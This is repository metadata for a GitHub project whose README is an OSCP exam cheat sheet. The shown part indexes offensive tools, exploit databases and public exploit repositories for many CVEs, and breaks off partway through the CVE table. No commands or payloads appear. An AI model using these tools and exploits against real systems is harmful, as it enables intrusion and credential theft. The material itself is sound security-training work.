{"id":13679795,"url":"https://github.com/0xsyr0/OSCP","last_synced_at":"2025-04-29T19:32:02.458Z","repository":{"id":47026242,"uuid":"420042240","full_name":"0xsyr0/OSCP","owner":"0xsyr0","description":"OSCP Cheat Sheet","archived":false,"fork":false,"pushed_at":"2025-04-22T13:11:27.000Z","size":5490,"stargazers_count":3157,"open_issues_count":0,"forks_count":671,"subscribers_count":67,"default_branch":"main","last_synced_at":"2025-04-22T13:49:10.721Z","etag":null,"topics":["cheat-sheet","cheatsheet","offensive","offensive-security","offsec","oscp","oscp-guide","oscp-plus","penetration-testing","pentesting","security"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0xsyr0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":"CODE-OF-CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null},"funding":{"github":"0xsyr0","patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"lfx_crowdfunding":null,"custom":null}},"created_at":"2021-10-22T09:36:48.000Z","updated_at":"2025-04-22T13:11:30.000Z","dependencies_parsed_at":"2023-09-29T07:10:50.464Z","dependency_job_id":"c7035127-0d5a-45ef-b3ed-c64fe7164f3c","html_url":"https://github.com/0xsyr0/OSCP","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP/tags","releases_url
":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xsyr0","download_url":"https://codeload.github.com/0xsyr0/OSCP/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251569549,"owners_count":21610575,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cheat-sheet","cheatsheet","offensive","offensive-security","offsec","oscp","oscp-guide","oscp-plus","penetration-testing","pentesting","security"],"created_at":"2024-08-02T13:01:09.665Z","updated_at":"2025-04-29T19:31:57.443Z","avatar_url":"https://github.com/0xsyr0.png","language":"PowerShell","funding_links":["https://github.com/sponsors/0xsyr0"],"categories":["PowerShell","红队\u0026渗透测试"],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003cimg width=\"300\" height=\"300\" src=\"/images/kali-linux.svg\"\u003e\n\u003c/p\u003e\n\n# OSCP Cheat Sheet\n\n![GitHub stars](https://img.shields.io/github/stars/0xsyr0/OSCP?logoColor=yellow) ![GitHub forks](https://img.shields.io/github/forks/0xsyr0/OSCP?logoColor=purple) ![GitHub watchers](https://img.shields.io/github/watchers/0xsyr0/OSCP?logoColor=green)\u003c/br\u003e\n![GitHub commit activity (branch)](https://img.shields.io/github/commit-activity/m/0xsyr0/OSCP) ![GitHub contributors](https://img.shields.io/github/contributors/0xsyr0/OSCP)\n\nSince this little project gets more and more attention, I decided to 
update it as often as possible to focus on the most helpful and absolutely necessary commands for the exam. Since OffSec published the `OffSec Certified Professional Plus` or `OSCP+` certification, which is only valid for `3 years`, I will now add more advanced techniques such as `Active Directory Certificate Services (ADCS) Abuse` and `Shadow Credentials Attacks` to cover as much course content as possible.\n\nFeel free to submit a pull request or reach out to me on [X](https://twitter.com/syr0_) for suggestions. Every contribution is appreciated!\n\n\u003e [!IMPORTANT]\n\u003e Someone on X made a good point: automatic exploitation tools like `sqlmap` are prohibited in the exam. The same goes for the automatic exploitation functionality of `LinPEAS`.\n\u003e I am not keeping track of the current guidelines for those tools, so I want to point out that I am not responsible if anybody uses a tool without double-checking the latest exam restrictions and fails the exam.\n\u003e Inform yourself before taking the exam!\n\nHere are the links to the [OSCP Exam Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) and to the discussion about [LinPEAS](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/?hss_channel=tw-134994790). 
I hope this helps.\n\nAlso here are two more important resources you should check out before you take the exam.\n\n- [https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide)\n- [https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams](https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams)\n\n\u003e [!NOTE]\n\u003e This repository will also try to cover as much as possible of the tools required for the proving grounds boxes.\n\nThank you for reading.\n\n\u003cbr\u003e\n\n## Table of Contents\n\n- [Basics](#basics)\n- [Information Gathering](#information-gathering)\n- [Vulnerability Analysis](#vulnerability-analysis)\n- [Web Application Analysis](#web-application-analysis)\n- [Database Assessment](#database-assessment)\n- [Password Attacks](#password-attacks)\n- [Exploitation Tools](#exploitation-tools)\n- [Post Exploitation](#post-exploitation)\n- [Exploit Databases](#exploit-databases)\n- [CVEs](#cves)\n- [Payloads](#payloads)\n- [Wordlists](#wordlists)\n- [Reporting](#reporting)\n- [Social Media Resources](#social-media-resources)\n- [Commands](#commands)\n\t- [Basics](#basics-1)\n\t\t- [curl](#curl)\n\t\t- [File Transfer](#file-transfer)\n  \t\t- [FTP](#ftp)\n\t\t- [Kerberos](#kerberos)\n\t\t- [Linux](#linux)\n\t\t- [Microsoft Windows](#microsoft-windows)\n\t\t- [PHP Webserver](#php-webserver)\n\t\t- [Ping](#ping)\n\t\t- [Port Forwarding](#port-forwarding-1)\n\t\t- [Python Webserver](#python-webserver)\n\t\t- [RDP](#rdp)\n\t\t- [showmount](#showmount)\n  \t\t- [SMB](#smb)\n\t\t- [smbclient](#smbclient)\n\t\t- [SSH](#ssh)\n\t\t- [Time and Date](#time-and-date)\n\t\t- [Tmux](#tmux)\n\t\t- [Upgrading Shells](#upgrading-shells)\n\t\t- [VirtualBox](#virtualbox)\n\t\t- [virtualenv](#virtualenv)\n\t- [Information Gathering](#information-gathering-1)\n\t\t- [memcached](#memcached)\n\t\t- [NetBIOS](#netbios)\n\t\t- [Nmap](#nmap)\n\t\t- [Port 
Scanning](#port-scanning)\n\t\t- [snmpwalk](#snmpwalk)\n\t- [Web Application Analysis](#web-application-analysis-1)\n\t\t- [Burp Suite](#burp-suite)\n  \t\t- [cadaver](#cadaver)\n\t\t- [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)\n\t\t- [ffuf](#ffuf)\n\t\t- [Gobuster](#gobuster)\n\t\t- [GitTools](#gittools)\n\t\t- [Local File Inclusion (LFI)](#local-file-inclusion-lfi)\n\t\t- [PDF PHP Inclusion](#pdf-php-inclusion)\n\t\t- [PHP Upload Filter Bypasses](#php-upload-filter-bypasses)\n\t\t- [PHP Filter Chain Generator](#php-filter-chain-generator)\n\t\t- [PHP Generic Gadget Chains (PHPGGC)](#php-generic-gadget-chains-phpggc)\n\t\t- [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)\n\t\t- [Server-Side Template Injection (SSTI)](#server-side-template-injection-ssti)\n\t\t- [Upload Vulnerabilities](#upload-vulnerabilities)\n\t\t- [wfuzz](#wfuzz)\n\t\t- [WPScan](#wpscan)\n\t\t- [XML External Entity (XXE)](#xml-external-entity-xxe)\n\t- [Database Analysis](#database-analysis)\n \t\t- [impacket-mssqlclient](#impacket-mssqlclient)\n\t\t- [MongoDB](#mongodb)\n\t\t- [MSSQL](#mssql)\n\t\t- [MySQL](#mysql)\n\t\t- [NoSQL Injection](#nosql-injection)\n\t\t- [PostgreSQL](#postgresql)\n\t\t- [Redis](#redis)\n\t\t- [SQL Injection](#sql-injection)\n\t\t- [SQL Truncation Attack](#sql-truncation-attack)\n\t\t- [sqlite3](#sqlite3)\n\t\t- [sqsh](#sqsh)\n\t- [Password Attacks](#password-attacks-1)\n\t\t- [DonPAPI](#donpapi)\n\t\t- [fcrack](#fcrack)\n  \t\t- [Group Policy Preferences (GPP)](#group-policy-preferences-gpp)\n\t\t- [hashcat](#hashcat)\n\t\t- [Hydra](#hydra)\n\t\t- [John](#john)\n\t\t- [Kerbrute](#kerbrute)\n\t\t- [LaZagne](#lazagne)\n\t\t- [mimikatz](#mimikatz)\n  \t\t- [NetExec](#netexec)\n\t\t- [pypykatz](#pypykatz)\n\t\t- [Spray-Passwords](#spray-passwords)\n\t- [Exploitation Tools](#exploitation-tools-1)\n\t\t- [Metasploit](#metasploit)\n\t- [Post Exploitation](#post-exploitation-1)\n \t\t- [Account Operators Group 
Membership](#account-operators-group-membership)\n \t\t- [Active Directory](#active-directory)\n \t\t- [Active Directory Certificate Services (AD CS)](#active-directory-certificate-services-ad-cs)\n\t\t- [ADCSTemplate](#adcstemplate)\n  \t\t- [ADMiner](#adminer)\n\t\t- [BloodHound](#bloodhound)\n\t\t- [BloodHound Python](#bloodhound-python)\n  \t\t- [bloodyAD](#bloodyAD)\n\t\t- [Certify](#certify)\n\t\t- [Certipy](#certipy)\n\t\t- [enum4linux-ng](#enum4linux-ng)\n\t\t- [Evil-WinRM](#evil-winrm)\n\t\t- [Impacket](#impacket-1)\n\t\t- [JAWS](#jaws)\n\t\t- [Kerberos](#kerberos-1)\n\t\t- [ldapsearch](#ldapsearch)\n\t\t- [Linux](#linux-1)\n\t\t- [Microsoft Windows](#microsoft-windows-1)\n\t\t- [PassTheCert](#passthecert)\n\t\t- [PKINITtools](#pkinittools)\n\t\t- [Port Scanning](#port-scanning-1)\n\t\t- [powercat](#powercat)\n\t\t- [Powermad](#powermad)\n\t\t- [PowerShell](#powershell)\n  \t\t- [PrivescCheck](#privesccheck)\n\t\t- [pwncat](#pwncat)\n\t\t- [rpcclient](#rpcclient)\n\t\t- [Rubeus](#rubeus)\n\t\t- [RunasCs](#runascs)\n\t\t- [Seatbelt](#seatbelt)\n\t\t- [Shadow Credentials](#shadow-credentials)\n\t\t- [smbpasswd](#smbpasswd)\n\t\t- [winexe](#winexe)\n\t- [Social Engineering Tools](#social-engineering-tools)\n\t\t- [Microsoft Office Word Phishing Macro](#microsoft-office-word-phishing-macro)\n\t\t- [Microsoft Windows Library Files](#microsoft-windows-library-files)\n\t- [CVE](#cve)\n\t\t- [CVE-2014-6271: Shellshock RCE PoC](#cve-2014-6271-shellshock-rce-poc)\n\t\t- [CVE-2016-1531: exim LPE](#cve-2016-1531-exim-lpe)\n\t\t- [CVE-2019-14287: Sudo Bypass](#cve-2019-14287-sudo-bypass)\n\t\t- [CVE-2020-1472: ZeroLogon PE](#cve-2020-1472-zerologon-pe)\n\t\t- [CVE-2021–3156: Sudo / sudoedit LPE](#cve-2021-3156-sudo--sudoedit-lpe)\n\t\t- [CVE-2021-44228: Log4Shell RCE (0-day)](#cve-2021-44228-log4shell-rce-0-day)\n\t\t- [CVE-2022-0847: Dirty Pipe LPE](#cve-2022-0847-dirty-pipe-lpe)\n\t\t- [CVE-2022-22963: Spring4Shell RCE 
(0-day)](#cve-2022-22963-spring4shell-rce-0-day)\n\t\t- [CVE-2022-31214: Firejail LPE](#cve-2022-31214-firejail-lpe)\n\t\t- [CVE-2023-21746: Windows NTLM EoP LocalPotato LPE](#cve-2023-21746-windows-ntlm-eop-localpotato-lpe)\n\t\t- [CVE-2023-22809: Sudo Bypass](#cve-2023-22809-sudo-bypass)\n\t\t- [CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day)](#cve-2023-32629-cve-2023-2640-gameoverlay-ubuntu-kernel-exploit-lpe-0-day)\n  \t\t- [CVE-2023-4911: Looney Tunables LPE](#cve-2023-4911-looney-tunables-lpe)\n   \t\t- [CVE-2023-7028: GitLab Account Takeover](#cve-2023-7028-gitlab-account-takeover)\n   \t\t- [CVE-2024-4577: PHP-CGI Argument Injection Vulnerability RCE](#cve-2024-4577-php-cgi-argument-injection-vulnerability-rce)\n  \t\t- [GodPotato LPE](#godpotato-lpe)\n\t\t- [Juicy Potato LPE](#juicy-potato-lpe)\n  \t\t- [JuicyPotatoNG LPE](#juicypotatong-lpe)\n\t\t- [MySQL 4.x/5.0 User-Defined Function (UDF) Dynamic Library (2) LPE](#mysql-4x50-user-defined-function-udf-dynamic-library-2-lpe)\n  \t\t- [PrintSpoofer LPE](#printspoofer-lpe)\n\t\t- [SharpEfsPotato LPE](#sharpefspotato-lpe)\n\t\t- [Shocker Container Escape](#shocker-container-escape)\n\t- [Payloads](#payloads-1)\n\t\t- [Exiftool](#exiftool)\n\t\t- [Reverse Shells](#reverse-shells)\n\t\t- [Web Shells](#web-shells)\n\t- [Templates](#templates)\n\t\t- [ASPX Web Shell](#aspx-web-shell)\n\t\t- [Bad YAML](#bad-yaml)\n\t- [Wordlists](#wordlists-1)\n\t\t- [Bash](#bash)\n\t\t- [CeWL](#cewl)\n\t\t- [CUPP](#cupp)\n\t\t- [crunch](#crunch)\n  \t\t- [JavaScript Quick Wordlist](#javascript-quick-wordlist)\n\t\t- [Username Anarchy](#username-anarchy)\n\n### Basics\n\n| Name | URL |\n| --- | --- |\n| Chisel | https://github.com/jpillora/chisel |\n| CyberChef | https://gchq.github.io/CyberChef |\n| Ligolo-ng | https://github.com/nicocha30/ligolo-ng |\n| Swaks | https://github.com/jetmore/swaks |\n\n### Information Gathering\n\n| Name | URL |\n| --- | --- |\n| Nmap | https://github.com/nmap/nmap 
|\n\n### Vulnerability Analysis\n\n| Name | URL |\n| --- | --- |\n| nikto | https://github.com/sullo/nikto |\n| Sparta | https://github.com/SECFORCE/sparta |\n\n### Web Application Analysis\n\n| Name | URL |\n| --- | --- |\n| ffuf | https://github.com/ffuf/ffuf |\n| fpmvuln | https://github.com/hannob/fpmvuln |\n| Gobuster | https://github.com/OJ/gobuster |\n| JSON Web Tokens | https://jwt.io |\n| JWT_Tool | https://github.com/ticarpi/jwt_tool |\n| Leaky Paths | https://github.com/ayoubfathi/leaky-paths |\n| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |\n| PHP Filter Chain Generator | https://github.com/synacktiv/php_filter_chain_generator |\n| PHPGGC | https://github.com/ambionics/phpggc |\n| Spose | https://github.com/aancw/spose |\n| Wfuzz | https://github.com/xmendez/wfuzz |\n| WhatWeb | https://github.com/urbanadventurer/WhatWeb |\n| WPScan | https://github.com/wpscanteam/wpscan |\n\n### Database Assessment\n\n| Name | URL |\n| --- | --- |\n| RedisModules-ExecuteCommand | https://github.com/n0b0dyCN/RedisModules-ExecuteCommand |\n| Redis RCE | https://github.com/Ridter/redis-rce |\n| Redis Rogue Server | https://github.com/n0b0dyCN/redis-rogue-server |\n| SQL Injection Cheatsheet | https://tib3rius.com/sqli.html |\n\n### Password Attacks\n\n| Name | URL |\n| --- | --- |\n| Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet |\n| Firefox Decrypt | https://github.com/unode/firefox_decrypt |\n| hashcat | https://hashcat.net/hashcat |\n| Hydra | https://github.com/vanhauser-thc/thc-hydra |\n| John | https://github.com/openwall/john |\n| keepass-dump-masterkey | https://github.com/CMEPW/keepass-dump-masterkey |\n| KeePwn | https://github.com/Orange-Cyberdefense/KeePwn |\n| Kerbrute | https://github.com/ropnop/kerbrute |\n| LaZagne | https://github.com/AlessandroZ/LaZagne |\n| mimikatz | https://github.com/gentilkiwi/mimikatz |\n| NetExec | https://github.com/Pennyw0rth/NetExec |\n| ntlm.pw | 
https://ntlm.pw |\n| pypykatz | https://github.com/skelsec/pypykatz |\n\n### Exploitation Tools\n\n| Name | URL |\n| --- | --- |\n| Evil-WinRM | https://github.com/Hackplayers/evil-winrm |\n| Metasploit | https://github.com/rapid7/metasploit-framework |\n\n### Post Exploitation\n\n| Name | URL |\n| --- | --- |\n| ADCSKiller - An ADCS Exploitation Automation Tool | https://github.com/grimlockx/ADCSKiller |\n| ADCSTemplate | https://github.com/GoateePFE/ADCSTemplate |\n| ADMiner | https://github.com/Mazars-Tech/AD_Miner |\n| adPEAS | https://github.com/ajm4n/adPEAS |\n| BloodHound Docker | https://github.com/belane/docker-bloodhound |\n| BloodHound | https://github.com/BloodHoundAD/BloodHound |\n| BloodHound | https://github.com/ly4k/BloodHound |\n| BloodHound Collectors | https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors |\n| BloodHound Python | https://github.com/dirkjanm/BloodHound.py |\n| bloodhound-quickwin | https://github.com/kaluche/bloodhound-quickwin |\n| Certify | https://github.com/GhostPack/Certify |\n| Certipy | https://github.com/ly4k/Certipy |\n| Cheat Sheet - Attack Active Directory | https://github.com/drak3hft7/Cheat-Sheet---Active-Directory |\n| DonPAPI | https://github.com/login-securite/DonPAPI |\n| enum4linux-ng | https://github.com/cddmp/enum4linux-ng |\n| Ghostpack-CompiledBinaries | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries |\n| GTFOBins | https://gtfobins.github.io |\n| Impacket | https://github.com/fortra/impacket |\n| Impacket Static Binaries | https://github.com/ropnop/impacket_static_binaries |\n| JAWS | https://github.com/411Hall/JAWS |\n| KrbRelay | https://github.com/cube0x0/KrbRelay |\n| KrbRelayUp | https://github.com/Dec0ne/KrbRelayUp |\n| Krbrelayx | https://github.com/dirkjanm/krbrelayx |\n| LAPSDumper | https://github.com/n00py/LAPSDumper |\n| LES | https://github.com/The-Z-Labs/linux-exploit-suggester |\n| LinEnum | https://github.com/rebootuser/LinEnum |\n| lsassy | 
https://github.com/Hackndo/lsassy |\n| Moriarty | https://github.com/BC-SECURITY/Moriarty |\n| nanodump | https://github.com/fortra/nanodump |\n| PassTheCert | https://github.com/AlmondOffSec/PassTheCert |\n| PEASS-ng | https://github.com/carlospolop/PEASS-ng |\n| PKINITtools | https://github.com/dirkjanm/PKINITtools |\n| powercat | https://github.com/besimorhino/powercat |\n| PowerSharpPack | https://github.com/S3cur3Th1sSh1t/PowerSharpPack |\n| PowerUp | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 |\n| PowerView | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 |\n| PowerView.py | https://github.com/aniqfakhrul/powerview.py |\n| PPLdump | https://github.com/itm4n/PPLdump |\n| Priv2Admin | https://github.com/gtworek/Priv2Admin |\n| PrivescCheck | https://github.com/itm4n/PrivescCheck |\n| PSPKIAudit | https://github.com/GhostPack/PSPKIAudit |\n| pspy | https://github.com/DominicBreuker/pspy |\n| pth-toolkit | https://github.com/byt3bl33d3r/pth-toolkit |\n| pwncat | https://github.com/calebstewart/pwncat |\n| pypykatz | https://github.com/skelsec/pypykatz |\n| PyWhisker | https://github.com/ShutdownRepo/pywhisker |\n| Rubeus | https://github.com/GhostPack/Rubeus |\n| RunasCs | https://github.com/antonioCoco/RunasCs |\n| RustHound | https://github.com/OPENCYBER-FR/RustHound |\n| scavenger | https://github.com/SpiderLabs/scavenger |\n| SharpADWS | https://github.com/wh0amitz/SharpADWS |\n| SharpCollection | https://github.com/Flangvik/SharpCollection |\n| SharpChromium | https://github.com/djhohnstein/SharpChromium |\n| SharpHound | https://github.com/BloodHoundAD/SharpHound |\n| SharpView | https://github.com/tevora-threat/SharpView |\n| Sherlock | https://github.com/rasta-mouse/Sherlock |\n| WADComs | https://wadcoms.github.io |\n| Watson | https://github.com/rasta-mouse/Watson |\n| WESNG | https://github.com/bitsadmin/wesng |\n| Whisker | https://github.com/eladshamir/Whisker |\n| Windows-privesc-check 
| https://github.com/pentestmonkey/windows-privesc-check |\n| Windows Privilege Escalation Fundamentals | https://www.fuzzysecurity.com/tutorials/16.html |\n| Windows Privilege Escalation | https://github.com/frizb/Windows-Privilege-Escalation |\n\n### Exploit Databases\n\n| Database | URL |\n| --- | --- |\n| 0day.today Exploit Database | https://0day.today |\n| Exploit Database | https://www.exploit-db.com |\n| Packet Storm | https://packetstormsecurity.com |\n| Sploitus | https://sploitus.com |\n\n### CVEs\n\n| CVE | Description | URL |\n| --- | --- | --- |\n| CVE-2014-6271 | Shocker RCE | https://github.com/nccgroup/shocker |\n| CVE-2014-6271 | Shellshock RCE PoC | https://github.com/zalalov/CVE-2014-6271 |\n| CVE-2014-6271 | Shellshocker RCE POCs | https://github.com/mubix/shellshocker-pocs |\n| CVE-2016-5195 | Dirty COW LPE | https://github.com/firefart/dirtycow |\n| CVE-2016-5195 | Dirty COW '/proc/self/mem' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40847 |\n| CVE-2016-5195 | Dirty COW 'PTRACE_POKEDATA' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40839 |\n| CVE-2017-0144 | EternalBlue (MS17-010) RCE | https://github.com/d4t4s3c/Win7Blue |\n| CVE-2017-0199 | RTF Dynamite RCE | https://github.com/bhdresh/CVE-2017-0199 |\n| CVE-2018-7600 | Drupalgeddon 2 RCE | https://github.com/g0rx/CVE-2018-7600-Drupal-RCE |\n| CVE-2018-10933 | libSSH Authentication Bypass | https://github.com/blacknbunny/CVE-2018-10933 |\n| CVE-2018-16509 | Ghostscript PIL RCE | https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509 |\n| CVE-2019-14287 | Sudo Bypass LPE | https://github.com/n0w4n/CVE-2019-14287 |\n| CVE-2019-18634 | Sudo Buffer Overflow LPE | https://github.com/saleemrashid/sudo-cve-2019-18634 |\n| CVE-2019-5736 | RunC Container Escape PoC | https://github.com/Frichetten/CVE-2019-5736-PoC |\n| CVE-2019-6447 | ES File Explorer Open Port Arbitrary File Read | 
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln |\n| CVE-2019-7304 | dirty_sock LPE | https://github.com/initstring/dirty_sock |\n| CVE-2020-0796 | SMBGhost RCE PoC | https://github.com/chompie1337/SMBGhost_RCE_PoC |\n| CVE-2020-1472 | ZeroLogon PE Checker \u0026 Exploitation Code | https://github.com/VoidSec/CVE-2020-1472 |\n| CVE-2020-1472 | ZeroLogon PE Exploitation Script | https://github.com/risksense/zerologon |\n| CVE-2020-1472 | ZeroLogon PE PoC | https://github.com/dirkjanm/CVE-2020-1472 |\n| CVE-2020-1472 | ZeroLogon PE Testing Script | https://github.com/SecuraBV/CVE-2020-1472 |\n| CVE-2021-1675,CVE-2021-34527 | PrintNightmare LPE RCE | https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527 |\n| CVE-2021-1675 | PrintNightmare LPE RCE (PowerShell Implementation) | https://github.com/calebstewart/CVE-2021-1675 |\n| CVE-2021-21972 | vCenter RCE | https://github.com/horizon3ai/CVE-2021-21972 |\n| CVE-2021-22204 | ExifTool Command Injection RCE | https://github.com/AssassinUKG/CVE-2021-22204 |\n| CVE-2021-22204 | GitLab ExifTool RCE | https://github.com/CsEnox/Gitlab-Exiftool-RCE |\n| CVE-2021-22204 | GitLab ExifTool RCE (Python Implementation) | https://github.com/convisolabs/CVE-2021-22204-exiftool |\n| CVE-2021-26085 | Confluence Server RCE | https://github.com/Phuong39/CVE-2021-26085 |\n| CVE-2021-27928 | MariaDB/MySQL wsrep provider RCE | https://github.com/Al1ex/CVE-2021-27928 |\n| CVE-2021-3129 | Laravel Framework RCE | https://github.com/nth347/CVE-2021-3129_exploit |\n| CVE-2021-3156 | Sudo / sudoedit LPE  | https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit |\n| CVE-2021-3156 | Sudo / sudoedit LPE PoC | https://github.com/blasty/CVE-2021-3156 |\n| CVE-2021-3493 | OverlayFS Ubuntu Kernel Exploit LPE | https://github.com/briskets/CVE-2021-3493 |\n| CVE-2021-3560 | polkit LPE (C Implementation) | https://github.com/hakivvi/CVE-2021-3560 |\n| CVE-2021-3560 | polkit LPE | https://github.com/Almorabea/Polkit-exploit |\n| CVE-2021-3560 | 
polkit LPE PoC | https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation |\n| CVE-2021-36934 | HiveNightmare LPE | https://github.com/GossiTheDog/HiveNightmare |\n| CVE-2021-36942 | PetitPotam | https://github.com/topotam/PetitPotam |\n| CVE-2021-36942 | DFSCoerce | https://github.com/Wh04m1001/DFSCoerce |\n| CVE-2021-4034 | PwnKit Pkexec Self-contained Exploit LPE | https://github.com/ly4k/PwnKit |\n| CVE-2021-4034 | PwnKit Pkexec LPE PoC (1) | https://github.com/dzonerzy/poc-cve-2021-4034 |\n| CVE-2021-4034 | PwnKit Pkexec LPE PoC (2) | https://github.com/arthepsy/CVE-2021-4034 |\n| CVE-2021-4034 | PwnKit Pkexec LPE PoC (3) | https://github.com/nikaiw/CVE-2021-4034 |\n| CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Archive) | https://github.com/klinix5/InstallerFileTakeOver |\n| CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Fork) | https://github.com/waltlin/CVE-2021-41379-With-Public-Exploit-Lets-You-Become-An-Admin-InstallerFileTakeOver |\n| CVE-2021-41773,CVE-2021-42013, CVE-2020-17519 | Simples Apache Path Traversal (0-day) | https://github.com/MrCl0wnLab/SimplesApachePathTraversal |\n| CVE-2021-42278,CVE-2021-42287 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE | https://github.com/WazeHell/sam-the-admin |\n| CVE-2021-42278 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE (Python Implementation) | https://github.com/ly4k/Pachine |\n| CVE-2021-42287,CVE-2021-42278 | noPac LPE (1) | https://github.com/cube0x0/noPac |\n| CVE-2021-42287,CVE-2021-42278 | noPac LPE (2) | https://github.com/Ridter/noPac |\n| CVE-2021-42321 | Microsoft Exchange Server RCE | https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 |\n| CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/kozmer/log4j-shell-poc |\n| CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/welk1n/JNDI-Injection-Exploit |\n| CVE-2022-0847 | DirtyPipe-Exploit LPE | https://github.com/n3rada/DirtyPipe |\n| 
CVE-2022-0847 | DirtyPipe-Exploits LPE | https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits |\n| CVE-2022-21999 | SpoolFool, Windows Print Spooler LPE | https://github.com/ly4k/SpoolFool |\n| CVE-2022-22963 | Spring4Shell RCE (0-day) | https://github.com/tweedge/springcore-0day-en |\n| CVE-2022-23119,CVE-2022-23120 | Trend Micro Deep Security Agent for Linux Arbitrary File Read | https://github.com/modzero/MZ-21-02-Trendmicro |\n| CVE-2022-24715 | Icinga Web 2 Authenticated Remote Code Execution RCE | https://github.com/JacobEbben/CVE-2022-24715 |\n| CVE-2022-26134 | ConfluentPwn RCE (0-day) | https://github.com/redhuntlabs/ConfluentPwn |\n| CVE-2022-31214 | Firejail / Firejoin LPE | https://seclists.org/oss-sec/2022/q2/188 |\n| CVE-2022-31214 | Firejail / Firejoin LPE | https://www.openwall.com/lists/oss-security/2022/06/08/10 |\n| CVE-2022-34918 | Netfilter Kernel Exploit LPE | https://github.com/randorisec/CVE-2022-34918-LPE-PoC |\n| CVE-2022-46169 | Cacti Authentication Bypass RCE | https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit |\n| CVE-2023-20598 | PDFWKRNL Kernel Driver LPE | https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL |\n| CVE-2023-21746 | Windows NTLM EoP LocalPotato LPE | https://github.com/decoder-it/LocalPotato |\n| CVE-2023-21768 | Windows Ancillary Function Driver for WinSock LPE POC | https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768 |\n| CVE-2023-21817 | Kerberos Unlock LPE PoC | https://gist.github.com/monoxgas/f615514fb51ebb55a7229f3cf79cf95b |\n| CVE-2023-22809 | sudoedit LPE | https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc |\n| CVE-2023-23752 | Joomla Unauthenticated Information Disclosure | https://github.com/Acceis/exploit-CVE-2023-23752 |\n| CVE-2023-25690 | Apache mod_proxy HTTP Request Smuggling PoC | https://github.com/dhmosfunk/CVE-2023-25690-POC |\n| CVE-2023-28879 | Shell in the Ghost: Ghostscript RCE PoC | https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce 
